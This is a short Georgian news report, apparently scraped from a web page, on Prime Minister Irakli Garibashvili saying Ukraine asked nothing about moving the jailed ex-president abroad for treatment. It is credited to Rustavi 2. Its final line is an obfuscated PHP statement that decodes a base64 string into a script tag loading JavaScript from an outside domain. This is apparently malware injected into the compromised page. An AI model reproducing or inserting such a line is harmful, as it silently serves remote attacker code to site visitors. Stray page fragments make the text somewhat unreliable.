celsiusi
ავერსი საქკაბელი
შესაძლებელია, თუ არა რომ პატიმრობაში მყოფი ექსპრეზიდენტი სამკურნალოდ საზღვარგარეთ იქნას გადაყვანილი და იყო თუ არა ამასთან დაკავშირებით თხოვნა უკრაინიდან. ამის შესახებ საქართველოს პრემიერ-მინისტრმა  ღამის კურიერში ისაუბრა. ირაკლი ღარიბაშვილის თქმით, უკრაინის მხრიდან ასეთი თხოვნა არ ყოფილა.
 
"საუბარი გვქონდა, მე ამაზე საჯარო განცხადებაც გავავრცელე, მაგრამ ჩვენ ვართ დამოუკიდებელი სუვერენული სახელმწიფო და ვინც ჩვენ ქვეყნის კანონებს პატივს არ სცემს, შესაბამისად, მეც აბსოლუტურ იგნორს მოვახდენ ამა თუ იმ ქვეყნის თუ მათი ხელმძღვანელების - ეს ზოგადად.
 
მინდა დაგარწმუნოთ, რომ ისეთი ვითარებაა მსოფლიოში, როგორ წარმოგიდგენიათ, არათუ სხვა ქვეყნებზე, პატიმრებზე მით უმეტეს ფიქრობდეს ამა თუ იმ ქვეყნის ლიდერი. ეს ხომ აბსურდია. მინდა ბოდიში მოვუხადო საზოგადოებას, რომ აბსურდზე მიწევს კომენტარის გაკეთება,"  - განაცხადა ირაკლი ღარიბაშვილმა.
 
წყარო : რუსთავი 2
1430
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");